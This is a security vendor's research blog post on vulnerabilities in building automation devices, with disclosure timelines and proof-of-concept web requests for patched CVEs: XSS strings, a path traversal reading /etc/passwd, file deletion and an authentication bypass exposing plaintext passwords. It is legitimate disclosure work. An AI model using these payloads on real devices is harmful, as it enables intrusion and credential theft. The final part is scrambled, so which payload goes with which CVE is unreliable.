It is well known that cyber security is a constant game of cat and mouse, where both attackers and defenders are constantly evolving. Although we spent most of our time on the defensive side, part of our research activities involves thinking like an attacker to better defend the networks of our customers. This is useful not only to understand and defeat current Tactics, Techniques and Procedures (TTPs) used by real-world malicious actors, but also to anticipate future threats.
For the past months, the OT Research team at ForeScout performed an exercise in vulnerability and malware research for devices commonly used in BAS networks. Our goal was to create a proof-of-concept malware targeting building automation networks to raise awareness about a problem that we believe will become increasingly serious in the coming years. Although we haven’t yet seen malware specially crafted for smart buildings, malicious software targeting Industrial Control Systems (ICS) have seen enormous growth in the past decade (see, e.g., Industroyer, TRITON, and the more recent GreyEnergy). These attacks can be devastating and we believe that malware targeting smart buildings is an inevitable next step.
The main results of our research efforts were reported in a whitepaper and presented at the recent S4x19 conference. These results include:
- an analysis of the security landscape for building automation systems and networks;
- the discovery and responsible disclosure of previously unknown vulnerabilities in building automation devices;
- the development of a proof-of-concept malware that persists on devices at the automation level; and
- a discussion on how SilentDefense can help in protecting Building Automation Systems by promptly detecting threats.The malware described in the whitepaper uses both new vulnerabilities found by our team (e.g., buffer overflow, hardcoded secrets, and severe device misconfigurations) and recent vulnerabilities found by others. In the whitepaper, we highlight the increased attack surface due to the introduction of IoT devices in building automation networks; detail attack scenarios that can be used by a malware to disrupt such networks; and outline the consequences of such an attack in two critical subsystems of many facilities:
HVAC - changing temperature setpoints or crashing devices used for heating, ventilation, and air conditioning (HVAC) can take offline data centers used by large companies to store and process sensitive data (e.g., financial information), as well as harm people in facilities where these devices are vital, such as tunnels and mines; and
Physical Access Control – these systems are used to grant or deny access to certain areas of a building in places such as office spaces, but also in critical facilities such as airports and hospitals. An attacker who has access to the automation network of these buildings could control the doors to gain access to forbidden areas or deny access to otherwise authorized personnel.In this post, we want to highlight some of the vulnerabilities found during the research and development of the malware. We divided these vulnerabilities in two groups:
two high severity vulnerabilities that were used in the malware; and
- five vulnerabilities affecting other vendors that were not used in the final attack because they were out of the scope for the attack path that we implemented and because most of them have a low severity in the context of a BAS.
- High severity
These vulnerabilities allow a remote attacker to execute arbitrary code on the target device (a common access control PLC) and gain complete control of it. When we contacted the vendor about these issues, they informed us that the issues were already known and patched, but they were never publicly disclosed. Therefore, we keep the vendor and affected device anonymous, but give some details on the vulnerabilities:
- hardcoded secret - we found an encryption function using a hardcoded secret to store user passwords. This weakness allows an attacker to obtain the credentials of valid users of the device.
- buffer overflow - we found a buffer overflow leading to remote code execution on the PLC, which allows an attacker to take full control of the device.More details on these vulnerabilitie are reported in the whitepaper.2. Lower severity vulnerabilitiesThe vulnerabilities found by our team are summarized in the table below. Each discovered vulnerability was reported to the responsible vendor and subsequently patched, as shown in the Notes column.
- These vulnerabilities affect the web services that run in two BAS devices and that are used to manage them either in the internal network or even remotely. They all result from improper sanitization of output, e.g., Cross-site Scripting (XSS), or improper validation of user-input data, e.g., path traversal and authentication bypass.
- Even if these two issues are not 0-days in the proper sense (since they were known by the vendor and a patch existed for them) and they affect older versions of the framework used in the Access Control PLC (the versions we tested were from June 2013), they are very serious for at least one reason, which is common to ICS, IoT, and BAS devices: the myriad of devices available online (and probably many more not directly exposed) that can still be exploited because they are unpatched (see the conclusion of this post).
Product |
CVE |
Vulnerability Type |
Notes |
Loytec LGATE-902 |
XSS |
||
Loytec LGATE-902 |
Path traversal |
||
Loytec LGATE-902 |
Arbitrary file deletion |
||
EasyIO 30P |
XSS |
||
EasyIO 30P |
Authentication bypass |
The vulnerabilities on the Loytec device (CVE-2018-14919, CVE-2018-14918, and CVE-2018-14916) were disclosed to the vendor on 26th July, 2018; acknowledged by the vendor on 1st August, 2018; and patched on 13th November, 2018. The vulnerabilities on the EasyIO device were disclosed to the vendor on 3rd August, 2018; acknowledged by the vendor on 22nd August, 2018; and patched on 8th October, 2018
The XSS vulnerabilities (CVE-2018-14919, CVE-2018-15820) allow an attacker to inject malicious scripts into trusted web interfaces running on the vulnerable devices, which may be executed by the browser of an unsuspecting device administrator to access cookies, session tokens, or other sensitive information, as well as to perform malicious actions on behalf of the user. Besides accessing sensitive information, XSS attacks can be used for, e.g., internal network discovery and traffic tunneling using tools such as BeEF. Stored XSS allows an attacker to store the malicious script in the application, potentially executing it for every user that accesses the application. Reflected XSS, on the other hand, allows the attacker to send a non-persistent request containing the malicious script to a targeted user.
The path traversal and file deletion vulnerabilities (CVE-2018-14918 and CVE-2018-14916) allow an attacker to manipulate path references and access or delete files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read or delete system and configuration files containing, e.g., usernames and passwords.
The authentication bypass vulnerability (CVE-2018-15819) allows an attacker to execute privileged requests in the vulnerable application without possessing valid credentials, by manipulating the session identifier sent in the request. Any string of the same size as a valid identifier is accepted. In this specific instance, the attacker can even steal the credential information of application users, including plaintext passwords (see the proof-of-concept below).
Since all vulnerabilities have been patched a few months ago, below we present simple proof-of-concept (PoC) exploits for them. All the PoCs are requests to the web application running on a device with network address <dev_addr>.
CVE-2018-14919 Proof-of-concept
- Display an alert dialog (stored XSS): POST http://<dev_addr>/webui/config/doc/action save=1&update=1&data=[["test","</script><script>alert(1);</script>",2]]
- Display an alert dialog (reflected XSS): Read the /etc/passwd file containing usernames and hashed passwords: Delete a file test.txt stored in the directory above the web application:delete=1&update=1&name=../test.txtCVE-2018-15820 Proof-of-concept POST http://<dev_addr>/EASYIO30P-<session_token>/dev.htm GDN=...'onMouseOver='alert(1);&GDG=Group&GDL=LocationCVE-2018-15819 Proof-of-concepthttp://<dev_addr>/EASYIO30P-123456789012345678901234567890123456789012345678/webuser.js ConclusionThe fact that these kinds of vulnerabilities --- which are simple to find and fix, but also very simple to exploit --- are still present in devices potentially used in critical buildings is alarming. The results of this research highlight the need for an efficient network security monitoring solution like SilentDefense.
- Another worrying fact is that these vulnerable devices can be found remotely accessible with publicly reachable network addresses using search engines such as Shodan and Censys. Using these search engines, we found 279 instances of the two devices mentioned in the table of low severity vulnerabilities (or similar devices from the same manufacturers, using the same vulnerable software), out of which 214 (76%) were potentially vulnerable. We also found 21621 instances of devices like the access control PLC mentioned in the high severity issues, out of which 7980 (37%) were potentially vulnerable. Unfortunately, many if these devices seem to be located in hospitals and schools (given the information displayed in the banners captured by the search engines).
- Besides the vulnerabilities reported here, we also found severe misconfigurations on a second-hand workstation used to manage building automation devices, which allowed us to obtain remote code execution and finally administrator privileges on the running operating system. In this case, the vendor claimed that these issues were introduced by the integrator.
- Access the webuser.js file containing plaintext passwords:
- Display an alert dialog (stored XSS):
- POST http://<dev_addr>/webui/config/doc/action
- CVE-2018-14916 Proof-of-concept
- http://<dev_addr>/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
- CVE-2018-14918 Proof-of-concept
- http://<dev_addr>/webui/data/alarm_log_obj?handle=1000%27-alert(1)-%27&page=0